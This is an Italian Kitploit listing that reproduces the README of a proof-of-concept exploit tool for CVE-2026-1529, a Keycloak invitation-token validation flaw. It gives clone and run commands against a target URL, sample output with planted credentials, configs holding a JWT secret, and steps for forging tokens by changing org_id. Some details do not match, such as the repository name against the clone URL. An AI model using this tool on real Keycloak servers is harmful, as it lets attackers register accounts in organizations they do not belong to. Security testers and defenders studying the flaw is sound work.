Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation — Strumento di exploit per CVE-2026-1529, che dimostra la registrazione non autorizzata di organizzazioni in Keycloak tramite manipolazione del token JWT. Include generazione del token, manipolazione e registrazione utente con generazione di report. | Kitploit
Strumenti/GitHubGitHub/ackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneSicurezza delle API
GitHubackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Strumento di exploit per CVE-2026-1529, che dimostra la registrazione non autorizzata di organizzazioni in Keycloak tramite manipolazione del token JWT. Include generazione del token, manipolazione e registrazione utente con generazione di report.

Vedi RepositorySito web
6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Strumento di Exploit per CVE-2026-1529 Keycloak

Keycloak: registrazione non autorizzata di organizzazioni tramite validazione impropria del token di invito


Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza. Utilizzalo solo su sistemi per cui hai esplicita autorizzazione a testare. L'accesso non autorizzato a sistemi informatici è illegale e non etico. Gli autori di questo strumento non sono responsabili di qualsiasi uso improprio o danno causato da questo software.

Creato da: f3ds cr3w est, 2002


Panoramica

CVE-2026-1529 è una vulnerabilità critica in Keycloak che consente la registrazione non autorizzata di organizzazioni tramite una validazione impropria del token di invito. Questo strumento di exploit dimostra la vulnerabilità manipolando i token JWT per registrare utenti in organizzazioni non autorizzate.

Dettagli Tecnici

  • ID CVE: CVE-2026-1529
  • Software Interessato: Keycloak (org.keycloak.services.resources.organizations)
  • Punteggio CVSS: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • Vettore di Attacco: Rete
  • Complessità dell'Attacco: Bassa
  • Impatto: Accesso non autorizzato alle risorse dell'organizzazione

Descrizione della Vulnerabilità

La vulnerabilità risiede nel processo di validazione del token JWT per gli inviti alle organizzazioni. Gli attaccanti possono manipolare i campi org_id e email nel payload JWT, consentendo loro di registrare utenti in qualsiasi organizzazione senza la dovuta autorizzazione.


Installazione

Prerequisiti

  • Python 3.7 o superiore
  • Gestore di pacchetti pip

Configurazione

  1. Clona o scarica lo strumento di exploit:
root@kitploit:~
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. Installa le dipendenze richieste:
root@kitploit:~
pip install -r requirements.txt
  1. Rendi eseguibile lo script di exploit:
root@kitploit:~
chmod +x keycloak-exploit.py

Utilizzo

Utilizzo Base

root@kitploit:~
# Utilizzo standard con URL di destinazione
python keycloak-exploit.py https://target-keycloak.com

# Mostra aiuto
python keycloak-exploit.py -h

# Mostra versione
python keycloak-exploit.py -v

Utilizzo Avanzato

root@kitploit:~
# Utilizza un token di invito personalizzato
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Utilizza un ID organizzazione personalizzato
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Utilizza un file di configurazione personalizzato
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Abilita il logging di debug
python keycloak-exploit.py -d https://target-keycloak.com

Opzioni della Riga di Comando

OpzioneDescrizioneObbligatoria
targetURL Keycloak di destinazione (IP o dominio)Sì
-t, --tokenToken di invito personalizzato da utilizzareNo
-o, --org-idID organizzazione personalizzatoNo
-c, --configPercorso del file di configurazioneNo
-d, --debugAbilita il logging di debugNo
-v, --versionMostra informazioni sulla versioneNo
-h, --helpMostra il messaggio di aiutoNo

Output

Exploit Riuscito

Quando l'exploit ha successo, vedrai un output come:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

Exploit Fallito

Se l'exploit fallisce, vedrai:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

Struttura del Progetto

root@kitploit:~
CVE-2026-1529-POC/
├── keycloak-exploit.py          # Script principale dell'exploit
├── requirements.txt             # Dipendenze Python
├── README.md                   # Questo file
├── config/
│   └── default_config.json     # Configurazione predefinita
├── utils/
│   ├── jwt_utils.py            # Utility per la manipolazione JWT
│   ├── http_utils.py           # Utility per il client HTTP
│   └── crypto_utils.py         # Utility crittografiche
├── output/
│   ├── logs/                   # File di log
│   └── reports/                # Report degli exploit

Configurazione

Configurazione Predefinita

Lo strumento utilizza un file di configurazione predefinito (config/default_config.json) con le seguenti impostazioni:

root@kitploit:~
{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

Configurazione Personalizzata

Puoi creare un file di configurazione personalizzato e utilizzarlo con l'opzione -c:

root@kitploit:~
{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

Dettagli Tecnici

Processo di Exploit

  1. Analisi del Target: Verifica se il target è un'istanza Keycloak vulnerabile
  2. Generazione del Token: Genera o utilizza un token di invito personalizzato
  3. Manipolazione del Token: Manipola il payload JWT per cambiare l'ID dell'organizzazione
  4. Registrazione Utente: Registra un utente utilizzando il token manipolato
  5. Test di Login: Verifica che l'utente creato possa accedere
  6. Generazione del Report: Crea un report dettagliato dell'exploit

Manipolazione JWT

Lo strumento sfrutta la validazione JWT impropria:

  1. Decodificando il token JWT senza verifica della firma
  2. Modificando il campo org_id per puntare a un'organizzazione diversa
  3. Modificando il campo email se necessario
  4. Ri-codificando il token con il payload manipolato

Considerazioni sulla Sicurezza

  • Lo strumento utilizza una corretta gestione degli errori e logging
  • Tutte le richieste di rete includono header appropriati
  • La validazione dell'input viene eseguita su tutti gli input utente
  • Lo strumento rispetta i codici di risposta del server target

Risoluzione dei Problemi

Problemi Comuni

  1. Errori di Connessione

    • Verifica che l'URL di destinazione sia accessibile
    • Verifica che il target sia un'istanza Keycloak
    • Controlla la connettività di rete e le impostazioni del firewall
  2. Errori di Validazione del Token

    • Assicurati che il formato del token sia corretto
    • Verifica che il token contenga i campi richiesti (org_id, email, invitation_type)
    • Verifica che il token non sia scaduto
  3. Errori di Registrazione

    • Verifica che l'endpoint di registrazione sia accessibile
    • Verifica il formato del token manipolato
    • Controlla se il target ha la registrazione dell'organizzazione abilitata

Modalità Debug

Abilita il logging di debug per una risoluzione dei problemi dettagliata:

root@kitploit:~
python keycloak-exploit.py -d https://target-keycloak.com

File di Log

  • Log principale: logs/exploit.log
  • Report: output/reports/exploit_report_YYYYMMDD_HHMMSS.txt

Metodologia di Test

Valutazione della Vulnerabilità

Lo strumento esegue i seguenti controlli:

  1. Health Check: Verifica che il target sia un'istanza Keycloak
  2. Rilevamento della Versione: Tenta di rilevare la versione di Keycloak
  3. Test degli Endpoint: Testa gli endpoint relativi alle organizzazioni
  4. Validazione del Token: Valida la struttura del token JWT

Validazione dell'Exploit

L'exploit è considerato riuscito se:

  1. Il target è vulnerabile
  2. Un utente può essere registrato utilizzando il token manipolato
  3. L'utente registrato può accedere con successo
  4. Viene generato un link di login valido

Best Practice di Sicurezza

Per le Organizzazioni

  1. Applica le Patch: Aggiorna all'ultima versione di Keycloak
  2. Validazione del Token: Implementa una corretta verifica della firma JWT
  3. Controllo degli Accessi: Limita la registrazione dell'organizzazione agli utenti autorizzati
  4. Monitoraggio: Monitora attività di registrazione sospette
  5. Sicurezza di Rete: Implementa regole firewall appropriate

Per i Ricercatori di Sicurezza

  1. Autorizzazione: Testa solo sistemi per cui hai il permesso di testare
  2. Divulgazione Responsabile: Segnala le vulnerabilità ai fornitori
  3. Documentazione: Mantieni registri dettagliati dei tuoi test
  4. Test Etici: Segui le pratiche di divulgazione responsabile

Licenza

Questo strumento è fornito esclusivamente per scopi educativi e di test di sicurezza. Utilizzalo a tuo rischio.

Creato da: f3ds cr3w est, 2002

Contatto: Per domande o feedback, fai riferimento al repository del progetto.


Changelog

Versione 1.0

  • Rilascio iniziale
  • Funzionalità di exploit di base
  • Capacità di manipolazione JWT
  • Generazione di report
  • Interfaccia a riga di comando

🙏 Ringraziamenti

  • Team di sviluppo di Keycloak
  • Ricercatori di sicurezza che hanno scoperto CVE-2026-1529
  • La community open-source della sicurezza

Ricorda: Da un grande potere deriva una grande responsabilità. Usa questo strumento con saggezza ed etica.

by f3ds cr3w est, 2002

Scarica lo strumento